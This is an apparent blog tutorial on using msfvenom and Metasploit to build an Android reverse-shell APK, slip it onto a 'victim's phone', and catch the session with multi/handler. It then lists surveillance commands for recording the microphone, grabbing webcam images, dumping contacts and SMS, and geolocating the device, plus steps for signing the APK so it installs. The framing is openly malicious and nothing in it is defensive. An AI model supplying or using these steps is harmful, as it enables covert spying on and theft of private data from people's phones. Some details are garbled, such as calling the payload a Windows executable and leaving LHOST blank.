Metasploit for the Future Hackers (msfvenom) : Hack Any Android Phone

msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.
So, let’s get started!!

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.

msfvenom -p android/meterpreter/reverse_tcp  LHOST= LPORT=4444 R > andro.apk
(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim’s phone and install it.

4. Start the metasploit framework console as follows :


5. Now it’s time to open and setup multi-handler. Follows the steps :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started……..

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    – record_mic
    – webcam_snap
    – webcam_stream
    – dump_contacts
    – dump_sms
    – geolocate

Error fixing(incase you get PARSE ERROR)
Parse error
   To fix this error download signapk – Click here to download
Steps to follow
  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “in cmd(not double quotes).
  4. copy it in your phone and install it.

Hope this works… 🙂

Will Be Posting Tutorial Video Soon…..

Share the post!!!!!! Enjoy HACKING!!!

Leave a Reply

Your email address will not be published. Required fields are marked *